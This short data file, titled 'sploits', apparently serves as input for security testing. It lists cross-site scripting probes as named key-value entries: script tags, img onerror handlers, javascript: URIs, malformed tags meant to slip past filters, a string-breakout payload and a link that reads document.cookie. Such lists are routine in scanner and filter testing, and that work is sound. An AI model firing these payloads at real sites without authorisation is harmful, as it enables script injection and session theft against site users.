title=sploits
locator='';!--"<XSS>=&{()}
basicXSS_1=<script>alert(123);</script>
basicXSS_2=<script>alert("XSS");</script>
basicXSS_3=<script>alert(/XSS/);</script>
imgXSS_1=<img src=a onerror=alert(123); />
imgXSS_2=<img src=a onerror=alert("XSS"); />
imgXSS_3=<img src=a onerror=alert(/XSS/); />
imgXSS_4=<img SRC="javascript:alert('XSS');">
imgXSS_grave=<IMG SRC=`javascript:alert("'XSS'")`>
anchorXSS_1=<a onmouseover=alert(document.cookie)>xxs link</a>
malformedXSS_script=<<SCRIPT>alert("XSS");//<</SCRIPT>
malformedXSS_body=<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
halfOpen=<IMG SRC="javascript:alert('XSS')"
javascriptXSS=\";alert('XSS');//
partial_charCode=String.fromCharCode(88,83,83)
